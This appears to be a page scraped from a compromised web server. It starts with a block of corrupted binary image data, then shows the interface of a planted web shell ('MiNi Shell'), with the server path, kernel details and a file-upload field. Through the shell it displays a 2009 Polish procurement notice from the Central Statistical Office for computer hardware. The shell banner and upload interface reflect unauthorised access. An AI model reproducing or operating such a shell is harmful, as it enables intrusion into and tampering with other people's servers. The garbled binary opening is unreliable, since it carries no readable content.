JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090721/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090721/116287-N-2009.html

<p class="kh_header"><b>Warszawa: Dostawa sprzętu komputerowego</b><br>
<b>Numer ogłoszenia: 116287 - 2009; data zamieszczenia: 21.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Główny Urząd  Statystyczny , Al. Niepodległości 208, 00-925 Warszawa, woj. mazowieckie, tel. 022 6083539, faks 022 6083189.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.stat.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu komputerowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sprzedaż i dostawa do siedziby Zamawiającego wraz z rozładunkiem i przemieszczeniem do miejsca wskazanego przez Zamawiającego - fabrycznie nowego sprzętu komputerowego. 
Przedmiot zamówienia obejmuje: I. Komputer stacjonarny z monitorem LCD 19 cali - 5 kompletów; II. Drukarka laserowa sieciowa monochromatyczna wraz z materiałami eksploatacyjnymi - 19 kompletów; III. Skaner A-4 - 5 sztuk; IV. Komputer przenośny 15,4 cala - 7 sztuk.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.23.21.10-8, 30.21.61.10-0, 30.21.30.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 2000,00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia ubiegać się mogą wykonawcy, którzy nie podlegają wykluczeniu na podstawie warunków określonych w art. 24 ust. 1 i ust. 2 ustawy Prawo zamówień publicznych oraz spełniają warunki określone w art. 22 ust. 1 pkt 1-3 ustawy.
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów, o których mowa poniżej.
Wykonawca zostanie wykluczony z postępowania, jeżeli nie spełni przynajmniej jednego z warunków, o których mowa w art. 24 ust. 1 i ust. 2 ustawy i w art. 22 ust. 1 pkt 1-3 ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wykonawca obowiązany jest złożyć oświadczenie dotyczące spełnienia warunków udziału w postępowaniu na druku lub według wzoru druku załączonego do SIWZ pn. Dokument nr 1, a każdy wspólnik spółki cywilnej i każdy podmiot występujący wspólnie złoży dodatkowo oświadczenie, że nie podlega wykluczeniu z postępowania z powodów, o których mowa w art. 24 ustawy, na druku lub według wzoru druku załączonego do SIWZ pn. Dokument nr 2.
2. Wykonawca obowiązany jest, na podstawie § 1 ust. 1 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 roku w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2006 r. Nr 87, poz. 605 ze zm.), złożyć w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem aktualny i wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej.
3. W przypadku złożenia oferty przez wykonawców występujących wspólnie każdy podmiot występujący wspólnie złoży dokument, o którym mowa w pkt 2.
4. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 2, składa dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
5. Jeżeli w kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w pkt 2, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, zachowując przy tym termin określony w pkt 2..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.stat.gov.pl/bip.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Główny Urząd Statystyczny, 00-925 Warszawa, al. Niepodległości 208, pok. 214.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.07.2009 godzina 10:00, miejsce: Główny Urząd Statystyczny, 00-925 Warszawa, al. Niepodległości 208, pok. 214.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> I. Informacje dotyczące oferowanych produktów.
Wykonawca wypełniając formularz cenowy w kolumnie Oferta potwierdzi wpisem TAK wymagania zawarte w kolumnie Charakterystyka/Wymagania minimalne lub przedstawi charakterystykę proponowaną przez siebie. W przypadku Materiałów eksploatacyjnych dla drukarek należy podać rodzaje i ilości tych materiałów.
II. Wykonawca obowiązany jest, na podstawie § 3 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 roku w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz. 605 z późn. zm.), złożyć w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem następujące dokumenty:
II.1 dotyczące komputera stacjonarnego:
1)	Certyfikat ISO 9001/2000 dla producenta sprzętu.
2)	Świadectwo zgodności firmy Microsoft z systemem Windows Vista - wydruk z Windows Vista Hardware Compatibility List wraz z odpowiednim raportem weryfikacyjnym.
3)	Zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczone produkty odpowiadają określonym normom lub specyfikacjom technicznym, lub oświadczenie producenta, lub oświadczenie jego przedstawiciela w Polsce dot. dopuszczalnego poziomu emisji hałasu dla dostarczonego modelu komputera (zgodnie z ISO 7779 i ISO 9296).
4)	Certyfikat ISO 9001/2000 dla podmiotu świadczącego serwis sprzętu.
5)	Świadectwo autoryzacji (lub równoważne) od producentów lub dystrybutorów dla podmiotu świadczącego serwis sprzętu upoważniające do serwisowania ich produktów.
II.2 dotyczące monitora:
1)	Certyfikat ISO 9001/2000 dla producenta sprzętu;
2)	Certyfikat TCO-03;
3)	Dokument potwierdzający spełnianie kryteriów programu Energy Star.
II.3 dotyczące komputera przenośnego:
1)	Certyfikat ISO 9001/2000 dla producenta sprzętu;
2)	Świadectwo zgodności firmy Microsoft z systemem Windows Vista - wydruk z Windows Vista Hardware Compatibility List wraz z odpowiednim raportem weryfikacyjnym;
3)	Certyfikat ISO 9001/2000 dla podmiotu świadczącego serwis sprzętu;
4)	Świadectwo autoryzacji (lub równoważne) od producentów lub dystrybutorów dla podmiotu świadczącego serwis sprzętu upoważniające do serwisowania ich produktów.
III. Informacja o sposobie porozumiewania się Zamawiającego z wykonawcami.
1.	W niniejszym postępowaniu oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i wykonawcy przekazują pisemnie, faksem lub drogą elektroniczną, z zastrzeżeniem pkt 2.
2.	W przypadku porozumiewania się faksem lub drogą elektroniczną Zamawiający żąda niezwłocznego potwierdzenia (faksem lub e-mailem) faktu otrzymania korespondencji, o której mowa w pkt 1. Zamawiający nie bierze odpowiedzialności za skutki braku zachowania przez wykonawcę powyższego wymogu.
3.	W sprawie uzyskania wyjaśnień do SIWZ wykonawca może zwrócić się do Zamawiającego nie później niż na 6 dni przed upływem terminu składania ofert, w formie i trybie opisanym 
w pkt 1. Zamawiający niezwłocznie odpowie na zadane pytania, przesyłając jednocześnie ich treść i wyjaśnienia wszystkim wykonawcom, którym Zamawiający przekazał SIWZ, bez ujawnienia źródła zapytania. 
4.	Treść zapytań wraz z wyjaśnieniami będzie udostępniona również na stronie internetowej Zamawiającego: www.stat.gov.pl/bip.
5.	We wszelkiej korespondencji dotyczącej niniejszego postępowania należy powoływać się na - Numer sprawy: 35/DAB/PN/2009.
6.	Godziny pracy Zamawiającego: poniedziałek - piątek: 8:15 - 16:15.
7.	Oświadczenia, zawiadomienia, wnioski przekazane do Zamawiającego za pomocą faksu, poczty elektronicznej uważa się za złożone w terminie, jeżeli ich treść dotrze do Zamawiającego - na jego adres przed upływem wymaganego terminu.
IV. Pouczenie o środkach ochrony prawnej przysługujących wykonawcy.
1. Wykonawcy przysługują środki ochrony prawnej określone w dziale VI ustawy, tj. protest, odwołanie, skarga do sądu.
2. Wobec treści ogłoszenia o zamówieniu, czynności podjętych przez Zamawiającego 
w toku postępowania oraz w przypadku zaniechania przez Zamawiającego czynności, do których jest obowiązany na podstawie ustawy, przysługuje wniesienie protestu do Zamawiającego.
3. Na podstawie art. 180 ust. 1 w związku z art. 27 ust. 1 ustawy Zamawiający wybiera formę wniesienia protestu oraz dalszego postępowania protestacyjnego: pisemnie, faksem lub drogą elektroniczną.
4. W przypadku wyboru formy faksowej lub drogą elektroniczną, o których mowa w pkt 3, Zamawiający żąda niezwłocznego potwierdzenia otrzymania faksu lub e-maila. Zamawiający nie bierze odpowiedzialności za skutki braku zachowania przez wykonawcę powyższego wymogu.
5. Protest wnosi się w terminie 7 dni od dnia, w którym wykonawca powziął lub mógł powziąć wiadomość o okolicznościach stanowiących podstawę jego wniesienia, z zastrzeżeniem pkt 6.
6. Protest dotyczący: 
1) treści ogłoszenia wnosi w terminie 7 dni od dnia publikacji ogłoszenia w Biuletynie Zamówień Publicznych,
2) postanowień SIWZ wnosi w terminie 7 dni od dnia jej zamieszczenia na stronie internetowej Zamawiającego.
7. Protest uważa się za wniesiony z chwilą, gdy dotarł on do Zamawiającego w taki sposób, że mógł zapoznać się z jego treścią.
8. Protest powinien wskazywać oprotestowaną czynność lub zaniechanie Zamawiającego, a także zawierać żądanie, zwięzłe przytoczenie zarzutów oraz okoliczności faktyczne i prawne uzasadniające wniesienie protestu.
9. Od rozstrzygnięcia protestu wykonawcy przysługuje odwołanie tylko w przypadku gdy protest dotyczył: 
1) opisu sposobu oceny spełniania warunków udziału w postępowaniu, 
2) wykluczenia wykonawcy z postępowania o udzielenie zamówienia;
3) odrzucenia oferty. 
10. Wykonawca wnosi odwołanie do Prezesa Urzędu Zamówień Publicznych w terminie 5 dni od dnia doręczenia rozstrzygnięcia protestu lub upływu terminu rozstrzygnięcia protestu, jednocześnie przekazując kopię treści odwołania Zamawiającemu. Złożenie odwołania w placówce pocztowej operatora publicznego jest równoznaczne z jego wniesieniem do Prezesa Urzędu.

Creat By MiNi SheLL
Email: jattceo@gmail.com